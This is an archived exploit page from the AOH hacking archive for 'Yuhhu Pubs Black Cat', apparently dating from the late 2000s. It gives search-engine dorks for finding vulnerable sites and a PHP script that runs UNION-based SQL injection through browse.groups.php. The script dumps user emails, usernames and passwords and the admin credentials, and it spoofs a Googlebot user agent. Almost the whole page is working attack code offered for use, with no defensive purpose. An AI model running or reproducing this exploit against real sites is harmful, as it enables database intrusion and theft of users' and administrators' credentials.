AOH :: HP Unsorted Y :: BX3737.HTM

Yuhhu Pubs Black Cat Remote SQL Injection Exploit



Yuhhu Pubs Black Cat Remote SQL Injection Exploit
Yuhhu Pubs Black Cat Remote SQL Injection Exploit



http://www.iamilkay.net/index.php/scriptler/arkadaslikscriptleri/yuhhuscript/6-yuhhuserisi/8-pubs=0D 
Dork --> inurl: browse.groups.php =0D
Dork 2 --> inurl:browse.events.php=0D
Dork 3 --> browse.music.php=0D
Dork 4 --> browse.groups.php=0D
*/=0D
set_time_limit(0);=0D
error_reporting(0);=0D
echo "=0D
Yuhhu Pubs Exploit [ Coded By RMx ]=0D
=0D USERS EXPLOIT :
=0D =D6rnek :http://www.example.com
=0D
=0D =0D
";=0D if (isset($_POST['site']))=0D {=0D $site=$_POST['site'];=0D $hacker="browse.groups.php?category=-1+union+select+1,2,3,concat(0x656D61696C3A20,email,0x206B756C6C616E6963693A20,username,0x2073696672653A20,password),5,6,7,8,9+from+joovili_users";=0D $curl = curl_init();=0D curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);=0D curl_setopt($curl, CURLOPT_URL, $site."/".$hacker);=0D curl_setopt($curl, CURLOPT_USERAGENT, 'Googlebot/2.1 (+http://www.google.com/bot.html)');=0D curl_setopt($curl, CURLOPT_REFERER, 'http://www.google.com');=0D $html = curl_exec($curl);=0D curl_close($curl);=0D preg_match_all('#(.*)<\/td>#',$html,$huseyin);=0D foreach ($huseyin[1] as $biyosecurity)=0D {=0D echo $biyosecurity ."
";=0D }=0D }=0D =0D echo "=0D =0D
=0D ADMIN EXPLOIT :
=0D =D6rnek :http://www.example.com
=0D
=0D =0D
";=0D if (isset($_POST['admin']))=0D {=0D $site=$_POST['admin'];=0D $hacker="browse.groups.php?category=-1+union+select+1,2,3,concat(0x206B756C6C616E6963693A20,admin_username,0x2073696672653A20,admin_password),5,6,7,8,9+from+joovili_admins";=0D $curl = curl_init();=0D curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);=0D curl_setopt($curl, CURLOPT_URL, $site."/".$hacker);=0D curl_setopt($curl, CURLOPT_USERAGENT, 'Googlebot/2.1 (+http://www.google.com/bot.html)');=0D curl_setopt($curl, CURLOPT_REFERER, 'http://www.google.com');=0D $html = curl_exec($curl);=0D curl_close($curl);=0D preg_match_all('#(.*)<\/td>#',$html,$huseyin);=0D foreach ($huseyin[1] as $biyosecurity)=0D {=0D echo $biyosecurity ."
";=0D }=0D }=0D ?>

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.